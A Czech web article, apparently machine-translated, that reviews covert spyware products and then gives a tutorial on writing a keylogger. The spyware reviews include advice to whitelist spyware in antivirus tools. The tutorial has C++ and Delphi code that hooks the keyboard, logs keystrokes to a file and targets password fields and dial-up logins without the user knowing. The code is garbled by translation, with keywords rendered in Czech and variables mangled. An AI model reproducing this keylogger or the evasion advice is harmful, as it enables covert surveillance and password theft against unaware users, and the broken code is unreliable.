Snitch - název tohoto programu je přeložen jako "snitch" a velmi nepřátelský vůči uživateli. Snitch špehuje činnost počítače. Funguje skrytě, nevyžaduje složité nastavení a má malý vliv na výkon systému.
Program je vydán v jediné verzi.
Vlastnosti a funkce Snitch:
- monitorování klávesnice, schránky, systémových událostí, procházení webu a komunikace v messengerech;
- příprava souhrnných zpráv a harmonogramů řízených akcí;
- nenáročné na konfiguraci sítě;
- ochrana před neoprávněným ukončením procesu programu;
- monitorování se provádí, i když není k dispozici připojení k síti.
Mezi nedostatky můžete vidět konflikty s antivirovým softwarem.
Jak odhalit špióna na počítači?
Najít spyware na vašem počítači, který se navenek neprojevuje, je obtížné, ale možné.
Takže i přes legitimitu, aplikace, které jsme zkontrolovali dokáže rozpoznat speciální antiviry,"Naostřeno" pro vyhledávání spywaru (trojské koně s funkcí špionáže), proto doporučujeme přidat nainstalovaný program do seznamu výjimek pro takové antiviry.
A pokud špióna nepotřebujete odstranit, ale potřebujete před ním pouze maskovat své činy, můžete využít antišpionážní nástroje, které i přes aktivní špionáž na vás zabrání odposlechu událostí klávesnice a screenshotů.
Pak se vaše korespondence a hesla nedostanou do nesprávných rukou.
Špionážní programy
existuje různé druhy spyware: keyloggery, snímky obrazovky, geolokátory, sběrače dat, internetoví špióni a další. Nějaký univerzální programy kombinovat několik funkcí pro usnadnění zpracování informací. Existují také specifičtější programy zaměřené na realizaci specifičtějších cílů: audio, video dohled skryté povahy, výběr hesla pro Wi-Fi sítě, pořizování snímků z webové kamery vašeho zařízení, poslech konverzací v oblíbených programech (Skype, Zello atd.), záloha veškeré informace z přenosných médií uživatele, ukládání informací z USB médií a mnoho dalších. Podívejme se na nejoblíbenější z těchto programů.
RealSpyMonitor
Spyware může nejen monitorovat, ale také odepřít uživatelům přístup k programům a webům. Filtry lze konfigurovat jak podle adresy webu, tak podle jednotlivých požadavků (například blokování přístupu na všechny weby pro slovo „porno“ na vašem domácí počítač). K dispozici je také možnost přístupu pouze na autorizované stránky a blokování přístupu ke zbytku internetu.
Rozhraní Realspy není rusifikované
Tento program má však také některé nevýhody. Jednou z nevýhod je, že program vůbec neumí pracovat s ruskojazyčnými operačními systémy. Po odstranění úhozů se do souborů protokolu místo ruských znaků zapisují hieroglyfy. To je pochopitelné, protože program není rusifikován. Druhou nevýhodou jsou vysoké náklady na program, což je také důležité.
Práskač
Tento program se příliš neliší od podobných, kterými se zabývají dálkové ovládání a administrace, ale stále je tu jeden podstatný rozdíl: funguje ve „skrytém“ režimu. Všechny informace shromážděné programem jsou okamžitě odesílány přes internet. Tento program je velmi výhodné použít pro vzdálený dohled nad vaším počítačem nebo počítači vaší společnosti, které mohou být umístěny jak v kanceláři, tak u zaměstnanců, kteří pracují na dálku doma. Program má možnost skryté instalace, která může pomoci při jeho instalaci na vzdálené počítače. Funkce programu spočívá v tom, že i když uživatel nemá internet, program stále shromažďuje informace a odesílá je okamžitě po připojení k internetu.
Snitch rozhraní
Program sleduje všechny stisky kláves, kliknutí myší, navštívené stránky, používané programy a také otevřené a upravované soubory. Všechny informace jsou systematizovány a prezentovány pohodlnou formou: je možné vytvářet grafy a zprávy. Můžete zjistit čas strávený v každém programu, počet hodin strávených na sociálních sítích nebo hrách. A sledování operací se soubory vám umožní sledovat bezpečnost servisních informací. Existují však také významné nevýhody: po instalaci řídicího modulu je velmi obtížné jej vypnout. je skrytá hluboko v systému. Vyskytují se stejné problémy a v případě potřeby jej odstraňte. Absence doladění sledování pro každý počítač zvlášť je velmi nepohodlné, protože není potřeba shromažďovat všechny informace o některých uživatelích.
Stáhnout SnitchPowerSpy
Program je téměř úplným analogem Snitche, liší se pouze v některých prvcích. Na rozdíl od výše uvedeného programu má možnost stahovat zprávy do FTP server nebo odesílání poštou a funguje ve zcela skrytém režimu. Administrátorskou část programu zavoláte pouze přednastavenou klávesovou zkratkou.
MaxartQuickEye
Program, který vám umožní sbírat detailní informace o akcích prováděných na počítači. Velmi to pomůže šéfovi, který stojí před nelehkou volbou ohledně snižování počtu zaměstnanců. Analýzou zpráv sestavených na základě informací shromážděných programem je snadné sledovat náklady na pracovní dobu každého zaměstnance. Navíc budou zohledněna skutečná data, nejen doba, kdy byl ten či onen program otevřen. Dokonce pracovní program byla otevřena celý den, ale celou tuto dobu uživatel strávil v sociální sítě, nebo hraní her, pak se to vše projeví v přehledech. Na základě shromážděných informací získáte skutečné množství pracovní doby, kterou zaměstnanci v práci stráví, a to nejen čas strávený u počítače utíráním prohozených kalhot.
Harmonogram pracovní doby
Kromě funkce shromažďování informací dokáže program vytvořit pro každého uživatele seznam povolených a zakázaných programů a časově omezit provoz programů.
MipkoEmployeeMonitor
EliteKeylogger
Podle tvůrců programu EliteKeylogger snadno spolupracuje s mnoha antiviry. To je velmi výhodné, protože téměř všechny spywarové programy jsou antiviry definovány jako „potenciálně nebezpečné“. Důležitou výhodou programu je navíc to, že v systému pracuje na nízké úrovni jádra a nijak nesnižuje jeho výkon. Program, na rozdíl od jiných keyloggerů, má širší arzenál: existují funkce pro sledování souborů odeslaných k tisku; programy, se kterými uživatel pracuje; sledování poštovní korespondence uživatele; ukládání korespondence v nejoblíbenějších messengerech (ICQ, Jabber, MSN, AOL, AIM). Neméně důležitou funkcí programu je práce s uživatelskými účty operačního systému, což umožňuje sledovat každého uživatele zvlášť.
Elitní keylogger
Program může odeslat přijaté informace poštou, zkopírovat je do složky v lokální síť nebo nahrát na FTP server. Zprávy se ukládají po dobu určenou v programu nebo dokud soubor nedosáhne zadané velikosti. Nevýhody: časté problémy s instalací na operačních sálech Systémy Windows 7 a 8. Po instalaci programu ovladače někdy letí na různá zařízení, také některé antiviry blokují program.
ActualSpy 2.8
Program, který se neliší od mnoha jiných spywarových programů. Shromažďuje data o uživateli a jeho systému, organizuje a odesílá informace uživateli přes místní síť nebo na vzdálený server. Čas od času jsou problémy s antiviry, zejména s Kaspersky.
Závěr
Všechny výše uvedené programy pomáhají uživateli provádět určité úkoly sledování práce na počítači. Některé jsou širšího záběru, některé jsou více specializované. Hlavní věcí je určit si úkoly, které vám byly přiděleny, a vybrat si potřebný program. Program NeoSpy poskytuje všechny potřebné moduly pro sledování provozu počítače, až po vytváření snímků z webové kamery a geografické sledování počítače, na kterém je program nainstalován. Sledování internetového provozu vám pomůže udržet si přehled o stránkách, které vaše dítě navštěvuje a které zadává vyhledávací dotazy... A sestavy zobrazené na počítači nebo přes internet vám pomohou rychle získat potřebné informace ve formě, která vám vyhovuje. Za pozornost stojí také Mipko Employee Monitor, který signalizuje zadaná slova ze seznamu a signalizuje to správci systému. Dalším programem je Maxart Quick Eye, který dokáže akce uživatele nejen sledovat, ale i zakazovat. Můžete vytvářet černé a bílé seznamy programů. Nezbývá než si vybrat požadovaný program a nainstalovat. A váš počítač bude pod kontrolou.
O psaní keyloggerů
již bylo řečeno mnohokrát, ale všechny
mají jednu velkou nevýhodu - zpravidla
velmi omezené
informace a nezapisovat vše do souboru protokolu,
to, co uživatel píše na klávesnici, je pro vás nepravděpodobné
dá spoustu jídla pro myšlenkové záznamy
mačkání tlačítek při hraní CS 😉
Z toho vyplývá, že špión musí být
pokročilé, a není hloupé zapisovat do logu vše, co
dávají mu 🙂 I pojmenujte takový program
špión neotočí jazykem - je to skoro
elektronický agent 007 :-))) Způsoby, jak
aby program zapsal do logu to zajímavé
máme spoustu materiálu. Nejjednodušší -
sledovat aktivní okna, tzn. ve kterém
momentálně se dusí knoflíky 🙂 Jak se máš,
Myslím, že víš, že špioni jsou obvykle tvořeni
spustitelný soubor a DLL. To je způsobeno skutečností
co zachytit zprávy do okna
nutné vytvořit nový PROCES a většina
vhodné k tomu je použít dll-ku.
Proto, aby se aktivoval
samotný logger, budete muset
okamžik načtení DLL a kdy aktivní okno
se změní na něco jiného - uvolněte jej z paměti.
Zvažte funkce práce s DLL v jazyce Visual
C++. Provede se načtení do dll paměti
funkce hINSTAGE = LoadLibrary ("name.dll"), kde je hINSTAGE
jako deskriptor DLL načtený do paměti,
name.dll je název knihovny. Chcete-li to vyložit,
existuje funkce FreeLibrary (hINSTAGE);
Nyní, jak můžeme potřebovat
aplikací. Například víme, že uživatel
čte poštu prostřednictvím webu www.mail.ru, pak můžete
nakonfigurujte agenta tak, aby zachytil
stisknutí kláves, když uživatel toto zadá
místo. (Je třeba připomenout, že v některých
špionážní klávesnice aplikace nejsou vůbec
může fungovat například v adresním řádku
Internet Explorer'a – to vede k „havárii
dokončení programů "- proč jste jinak
Windows chtěl :))) Pro tuto metodu je to docela
vhodné je i čtení hesel z "dialeru".
- pokud je uživatel paranoidní a pokaždé
zadá uživatelské jméno a předá ručně 🙂 Nebo jste velmi
je zajímavé vědět, co píše v Outlooku popř
v notebooku. Tady je kus kódu, který dělá
srovnání titulků oken s těmi, které potřebujeme.
HINSTAGE hINSTAGE;
zatímco (1)
{
// Spusťte smyčku.
int sl, ll;
11 = 1;
sl = 2;
// proměnné pro
čelitA.
char st;
HWND hw;
// Přejděte na nejjednodušší
mimochodem - porovnáváme řetězce znak po znaku:
výsledný titulek okna a s požadovaným
tětiva.
zatímco (ll! = sl)
{
hw = GetForegroundWindow ();
GetWindowText (hw, st, 128); // číst
char stt = "_ Zde napíšeme název požadovaného
nám windows_№1 ";
sl = strlen (stt);
11 = 0;
zatímco (stt == st)
// porovnej
řetězec po znaku
// je pohodlnější to udělat z pozice, která bude
zkontrolujte, zda je správný
// můžeme použít řetězec jako součást jiného řetězce
aby to vypadalo jako // široký filtr.
{
ll ++;
}
if (ll == sl) ( // if strings
zápas až do konce 1. řádku -
Stůj; // přerušit proces
}
// a tak dále - pokud
je třeba zkontrolovat více oken.
char stt = "_ Zde napíšeme název požadovaného
nám windows_№2 ";
sl = strlen (stt);
11 = 0;
zatímco (stt == st)
{
ll ++;
}
if (ll == sl) (
Stůj; // přerušit proces
}
Místo sekvenční kontroly můžete
udělat paralelní při srovnání v
jeden cyklus prvků čar, pokud je alespoň jeden
spárované - pak se aktivuje špionážní DLL.
hINSTAGE = LoadLibrary ("key1.dll");
Nyní musíme neustále kontrolovat
zda toto okno zůstane aktivní.
zatímco (ll == sl) //zatímco
čáry se shodují - točí se na místě
{
hw = GetForegroundWindow ();
GetWindowText (hw, st, 128);// číst
aktuálně aktivní okno.
11 = 0;
zatímco (stt == st)
{
ll ++;
}
}
Výstup ze smyčky znamená, že je aktivní
okno se změnilo, takže dále vykládáme „spyware“
knihovna a smyčka začíná od začátku - tzn.
program opět čeká na jeden z
potřebná okna.
FreeLibrary (hINSTAGE);
Výše uvedený způsob však má a
nevýhody - je nutné pokaždé zkontrolovat
z celého seznamu oken je to požadované
jsme momentálně aktivní. Proto
můžete použít jiný algoritmus - nekontrolujte
název okna, ale podívejte se, zda v tomto
prvky typu EditBox. Obvykle,
hesla jsou tam napsaná přesně 🙂 K tomu tam bude
podívejte se na prvky tohoto okna - a pokud
mezi nimi je Upravit - pak načíst DLL.
char p2, p3; // pole
symboly pro nadpisy oken.
Znovu zkontrolujeme všechna okna ve smyčce:
while (p3! = "Upravit") //zatímco
nenašel okno s editboxem - provedeme smyčku
{
hw = GetForegroundWindow ();
HWND hwnd_child; //proměnná
okenní prvek
hwnd_child = GetWindow (hw, GW_CHILD);
GetClassName (hwnd_child, p3,128);
if (p3! = "Upravit")
// pokud je první
nalezené položky okna - nikoli EditBox - pak
hledat dále
{
while (hwnd_child! = 0)
{
hwnd_child = GetWindow (hwnd_child, GW_HWNDNEXT);
GetClassName (hwnd_child, p3,128);
if (p3 == "Upravit")
{
Stůj;
}
}
}
}
Nyní o samotné spywarové knihovně DLL.
Je lepší to napsat v Delphi, protože toto
zralý potomek Pascala takové nemá
zvrácený „sipský“ zvyk
hnidopišství o datových typech. Vytvořit
vyberte knihovnu File-New-Direct Link Library - a
stub pro DLL je připraven. A zde je samotný kód:
klíč knihovny1;
používá Windows;
var
KHook: HHOOK; // proměnná pro
"pasti"
funkce KProc (Kód: celé číslo; wParam: Word; lParam: LongInt): LongInt; stdcall;
konst
KState: celé číslo = 1073741824; //kód
"stisknuta klávesa"
var
Simv: ShortString;
KL: pole Char; //pro
kontrola rozložení klávesnice
FStruktura: TOFSTRUCT;
F: TextFile;//proměnná
soubor pro zápis protokolu.
začít
// vyřadit zbytečné
zprávy
if (lParam a KState)<>0 pak
začít
Výstup;
konec;
AssignFile (F, 'keylog.txt');
// pokus o otevření
soubor „keylog.txt“:
pokud OpenFile (PChar ('keylog.txt'), FStruct, OF_EXIST) = HFILE_ERROR, pak
začít
ReWrite (F);// pokud soubor není
stvořeno – tvořící.
konec
else Připojit (F);
// pokud existuje, napište
konec.
Simv: = chr (0); // nastaveno na nulu
proměnná znaku načteného z klávesnice.
// analyzovat kód
stisknuto tlačítko
případ wParam of
// čísla
48..57: Simv: = Chr (wParam);
96: Simv: = '0';
97: Simv: = '1';
…
104: Simv: = '8';
105: Simv: = '9';
189 109: Simv: = '-';
110: Simv: = '.';
111: Simv: = '/';
konec;
GetKeyboardLayoutName (KL); //
kontrola rozložení
pokud KL = '00000409', pak// pokud
Latinský:
začít
případ wParam of
219: Simv: = "[';
221: Simv: = ']';
186: Simv: = ';';
222: Simv: = "" ";
188: Simv: = ',';
190: Simv: = '.';
191: Simv: = '/';
65..90: Simv: = Chr (wParam);
konec;
konec;
konec;
pokud KL = '00000419', pak// pokud
ruština
začít
případ wParam of
219: Simv: = 'X';
221: Simv: = 'b';
186: Simv: = 'F';
222: Simv: = 'E';
188: Simv: = 'B';
190: Simv: = 'Yu';
191: Simv: = '.';
65: Simv: = 'F';
…
87: Simv: = 'C';
88: Simv: = 'H';
89: Simv: = 'H';
90: Simv: = 'Já';
konec;
// pokud symbol není prázdný (tj.
pokud bylo stisknuto alfanumerické tlačítko)
// pak to zapiš do souboru
pokud Simv<>"Pak
Napište (F, Simv);
// zavřete soubor
CloseFile (F);
// předat zprávu
další pasti v systému
Výsledek: = CallNextHookEx (KHook, kód, wParam, lParam);
konec;
začít
// Nastražte past
k zachycení zpráv o klávesnici.
KHook: = SetWindowsHookEx (WH_KEYBOARD, @KProc, HInstance, 0);
Tento program lze také zjednodušit
v závislosti na oblasti použití - pokud
řekněme, že stačí počítat jednou
heslo z dialeru - pak můžete dát
zkontrolujte, zda jsou okna k tomu, co potřebujeme, a kdy
se stane aktivním - načíst knihovnu
key1.dll, počkejte určitou dobu
na které bude mít uživatel čas tyto znaky vyplnit
klávesnici a poté vyjměte knihovnu a
ukončit program. Něco takového 🙂
hINSTAGE = LoadLibrary ("key1.dll");
Spánek (10000);
// na to počkejte 10 sekund
čas, kdy uživatel zadá heslo.
// čas může být zvýšen v závislosti na
na míře inhibice uživatele
// a jeho rychlost psaní na klávesnici 🙂
FreeLibrary (hINSTAGE);
PS: Byly uvedeny všechny výše uvedené materiály
výhradně s demo a
obecné vzdělávací cíle, autor vytyčil
úkol předvést
algoritmus programu jako "upgraded
keylogger "a všechno
odpovědnost za použití tohoto
materiál na vás padá (nesnesitelné
zátěž 🙂) Implementace kódu obsahuje
drobné nepřesnosti, které nepoškozují skutečnost
algoritmus - zkuste je najít sami)).
PSS: Keylogger samozřejmě umí víc než jen
plnit svou hlavní funkci -
skutečně zapisovat do protokolu stisku tlačítek, ale také
změňte hodnoty stisknutých kláves podle svých
chuť - ale jak to udělat a k čemu to je
možná jen životně důležité - in
příště 🙂